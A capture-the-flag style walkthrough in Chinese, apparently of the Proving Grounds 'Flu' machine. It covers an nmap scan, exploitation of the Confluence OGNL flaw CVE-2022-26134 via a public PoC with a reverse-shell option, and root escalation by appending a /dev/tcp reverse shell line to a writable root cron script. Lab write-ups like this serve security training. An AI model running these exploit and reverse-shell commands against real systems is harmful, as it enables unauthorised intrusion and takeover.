PG_Flu

信息收集：

root@iZt4nbifrvtk7cy11744y4Z:~# nmap -p- -Pn -A -sS -T4 192.168.216.41Starting Nmap 7.80 ( https://nmap.org ) at 2025-02-26 15:40 CSTNmap scan report for 192.168.216.41Host is up (0.0029s latency).Not shown: 65532 closed portsPORT     STATE SERVICE       VERSION22/tcp   open  ssh           OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)8090/tcp open  opsmessaging?| fingerprint-strings: |   GetRequest: |     HTTP/1.1 302 |     Cache-Control: no-store|     Expires: Thu, 01 Jan 1970 00:00:00 GMT|     X-Confluence-Request-Time: 1740555626143|     Set-Cookie: JSESSIONID=D518E2E9A0A5F7BFDA68A6A59D3D9A57; Path=/; HttpOnly|     X-XSS-Protection: 1; mode=block|     X-Content-Type-Options: nosniff|     X-Frame-Options: SAMEORIGIN|     Content-Security-Policy: frame-ancestors 'self'|     Location: http://localhost:8090/login.action?os_destination=%2Findex.action&permissionViolation=true|     Content-Type: text/html;charset=UTF-8|     Content-Length: 0|     Date: Wed, 26 Feb 2025 07:40:26 GMT|     Connection: close|   HTTPOptions: |     HTTP/1.1 200 |     MS-Author-Via: DAV|     Content-Type: text/html;charset=UTF-8|     Content-Length: 0|     Date: Wed, 26 Feb 2025 07:40:26 GMT|     Connection: close|   RTSPRequest: |     HTTP/1.1 400 |     Content-Type: text/html;charset=utf-8|     Content-Language: en|     Content-Length: 1924|     Date: Wed, 26 Feb 2025 07:40:26 GMT|     Connection: close|     <!doctype html><html lang="en"><head><title>HTTP Status 400 |     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 |_    Request</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> Invalid character found in the HTTP protocol [RTSP&#47;1.00x0d0x0a0x0d0x0a...]</p><p><b>Description</b> The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid8091/tcp open  jamlink?| fingerprint-strings: |   FourOhFourRequest: |     HTTP/1.1 204 No Content|     Server: Aleph/0.4.6|     Date: Wed, 26 Feb 2025 07:41:01 GMT|     Connection: Close|   GetRequest: |     HTTP/1.1 204 No Content|     Server: Aleph/0.4.6|     Date: Wed, 26 Feb 2025 07:40:31 GMT|     Connection: Close|   HTTPOptions: |     HTTP/1.1 200 OK|     Access-Control-Allow-Origin: *|     Access-Control-Max-Age: 31536000|     Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST|     Server: Aleph/0.4.6|     Date: Wed, 26 Feb 2025 07:40:31 GMT|     Connection: Close|     content-length: 0|   Help, Kerberos, LDAPSearchReq, LPDString, SSLSessionReq, TLSSessionReq, TerminalServerCookie: |     HTTP/1.1 414 Request-URI Too Long|     text is empty (possibly HTTP/0.9)|   RTSPRequest: |     HTTP/1.1 200 OK|     Access-Control-Allow-Origin: *|     Access-Control-Max-Age: 31536000|     Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST|     Server: Aleph/0.4.6|     Date: Wed, 26 Feb 2025 07:40:31 GMT|     Connection: Keep-Alive|     content-length: 0|   SIPOptions: |     HTTP/1.1 200 OK|     Access-Control-Allow-Origin: *|     Access-Control-Max-Age: 31536000|     Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST|     Server: Aleph/0.4.6|     Date: Wed, 26 Feb 2025 07:41:06 GMT|     Connection: Keep-Alive|_    content-length: 02 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============SF-Port8090-TCP:V=7.80%I=7%D=2/26%Time=67BEC56A%P=x86_64-pc-linux-gnu%r(GeSF:tRequest,22F,"HTTP/1.1x20302x20rnCache-Control:x20no-storernExpSF:ires:x20Thu,x2001x20Janx201970x2000:00:00x20GMTrnX-Confluence-RSF:equest-Time:x201740555626143rnSet-Cookie:x20JSESSIONID=D518E2E9A0A5SF:F7BFDA68A6A59D3D9A57;x20Path=/;x20HttpOnlyrnX-XSS-Protection:x201;SF:x20mode=blockrnX-Content-Type-Options:x20nosniffrnX-Frame-OptionsSF::x20SAMEORIGINrnContent-Security-Policy:x20frame-ancestorsx20'selfSF:'rnLocation:x20http://localhost:8090/login.action?os_destination=%SF:2Findex.action&permissionViolation=truernContent-Type:x20text/html;SF:charset=UTF-8rnContent-Length:x200rnDate:x20Wed,x2026x20Febx20SF:2025x2007:40:26x20GMTrnConnection:x20closernrn")%r(HTTPOptionsSF:,97,"HTTP/1.1x20200x20rnMS-Author-Via:x20DAVrnContent-Type:x20SF:text/html;charset=UTF-8rnContent-Length:x200rnDate:x20Wed,x2026SF:x20Febx202025x2007:40:26x20GMTrnConnection:x20closernrn")%r(RSF:TSPRequest,820,"HTTP/1.1x20400x20rnContent-Type:x20text/html;charSF:set=utf-8rnContent-Language:x20enrnContent-Length:x201924rnDateSF::x20Wed,x2026x20Febx202025x2007:40:26x20GMTrnConnection:x20cloSF:sernrn<!doctypex20html><htmlx20lang="en"><head><title>HTTPx20SSF:tatusx20400x20xe2x80x93x20Badx20Request</title><stylex20type="SF:text/css">bodyx20{font-family:Tahoma,Arial,sans-serif;}x20h1,x20h2,SF:x20h3,x20bx20{color:white;background-color:#525D76;}x20h1x20{font-SF:size:22px;}x20h2x20{font-size:16px;}x20h3x20{font-size:14px;}x20pSF:x20{font-size:12px;}x20ax20{color:black;}x20.linex20{height:1px;baSF:ckground-color:#525D76;border:none;}</style></head><body><h1>HTTPx20StSF:atusx20400x20xe2x80x93x20Badx20Request</h1><hrx20class="line"SF:x20/><p><b>Type</b>x20Exceptionx20Report</p><p><b>Message</b>x20InvSF:alidx20characterx20foundx20inx20thex20HTTPx20protocolx20[RTSP&#SF:47;1.00x0d0x0a0x0d0x0a...]</p><p><b>Description</b>x20Thex20servSF:erx20cannotx20orx20willx20notx20processx20thex20requestx20duexSF:20tox20somethingx20thatx20isx20perceivedx20tox20bex20ax20clientSF:x20errorx20(e.g.,x20malformedx20requestx20syntax,x20invalidx2SF:0");==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============SF-Port8091-TCP:V=7.80%I=7%D=2/26%Time=67BEC56F%P=x86_64-pc-linux-gnu%r(GeSF:tRequest,68,"HTTP/1.1x20204x20Nox20ContentrnServer:x20Aleph/0.4SF:.6rnDate:x20Wed,x2026x20Febx202025x2007:40:31x20GMTrnConnectSF:ion:x20Closernrn")%r(HTTPOptions,EC,"HTTP/1.1x20200x20OKrnAccSF:ess-Control-Allow-Origin:x20*rnAccess-Control-Max-Age:x2031536000SF:rnAccess-Control-Allow-Methods:x20OPTIONS,x20GET,x20PUT,x20POSTrSF:nServer:x20Aleph/0.4.6rnDate:x20Wed,x2026x20Febx202025x2007:4SF:0:31x20GMTrnConnection:x20Closerncontent-length:x200rnrn")%rSF:(RTSPRequest,F1,"HTTP/1.1x20200x20OKrnAccess-Control-Allow-Origin:SF:x20*rnAccess-Control-Max-Age:x2031536000rnAccess-Control-Allow-MSF:ethods:x20OPTIONS,x20GET,x20PUT,x20POSTrnServer:x20Aleph/0.4.6SF:rnDate:x20Wed,x2026x20Febx202025x2007:40:31x20GMTrnConnectionSF::x20Keep-Aliverncontent-length:x200rnrn")%r(Help,46,"HTTP/1.1SF:x20414x20Request-URIx20Toox20Longrnrntextx20isx20emptyx20(poSF:ssiblyx20HTTP/0.9)")%r(SSLSessionReq,46,"HTTP/1.1x20414x20RequestSF:-URIx20Toox20Longrnrntextx20isx20emptyx20(possiblyx20HTTP/0SF:.9)")%r(TerminalServerCookie,46,"HTTP/1.1x20414x20Request-URIx20ToSF:ox20Longrnrntextx20isx20emptyx20(possiblyx20HTTP/0.9)")%r(TSF:LSSessionReq,46,"HTTP/1.1x20414x20Request-URIx20Toox20LongrnrnSF:textx20isx20emptyx20(possiblyx20HTTP/0.9)")%r(Kerberos,46,"HTTP/SF:1.1x20414x20Request-URIx20Toox20Longrnrntextx20isx20emptyx2SF:0(possiblyx20HTTP/0.9)")%r(FourOhFourRequest,68,"HTTP/1.1x20204xSF:20Nox20ContentrnServer:x20Aleph/0.4.6rnDate:x20Wed,x2026x20FSF:ebx202025x2007:41:01x20GMTrnConnection:x20Closernrn")%r(LPDStSF:ring,46,"HTTP/1.1x20414x20Request-URIx20Toox20Longrnrntextx20SF:isx20emptyx20(possiblyx20HTTP/0.9)")%r(LDAPSearchReq,46,"HTTP/1.SF:1x20414x20Request-URIx20Toox20Longrnrntextx20isx20emptyx20(SF:possiblyx20HTTP/0.9)")%r(SIPOptions,F1,"HTTP/1.1x20200x20OKrnAcSF:cess-Control-Allow-Origin:x20*rnAccess-Control-Max-Age:x2031536000SF:rnAccess-Control-Allow-Methods:x20OPTIONS,x20GET,x20PUT,x20POSTrSF:nServer:x20Aleph/0.4.6rnDate:x20Wed,x2026x20Febx202025x2007:SF:41:06x20GMTrnConnection:x20Keep-Aliverncontent-length:x200rnrSF:n");No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).TCP/IP fingerprint:OS:SCAN(V=7.80%E=4%D=2/26%OT=22%CT=1%CU=34851%PV=Y%DS=4%DC=T%G=Y%TM=67BEC5DOS:3%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPSOS:(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST1OS:1NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECNOS:(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AOS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(ROS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%FOS:=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%OS:RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)Network Distance: 4 hopsService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 3306/tcp)HOP RTT     ADDRESS1   2.54 ms 192.168.45.12   2.54 ms 192.168.45.2543   2.63 ms 192.168.251.14   2.85 ms 192.168.216.41OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 125.83 seconds

开放了8090和8091端口，只有8090的http服务能访问

在页面下面找到版本信息Atlassian Confluence 7.13.6 ，检索漏洞找到CVE-2022-26134，先用poc试了一下，成功执行id命令

搜索利用exp：https://github.com/XiaomingX/CVE-2022-26134-poc

python3 poc.py --rhost 192.168.216.41 --rport 8090 --lhost 192.168.45.184 --lport 3000 --protocol http:// --reverse-shell

拿到local

信息收集发现root运行了一个/opt/log-backup.sh脚本

该脚本是目前shell用户的，可以编辑

修改脚本内容

echo"sh -i >& /dev/tcp/192.168.45.184/8001 0>&1" >> /opt/log-backup.sh

监听端口等一会拿到shell

拿到proof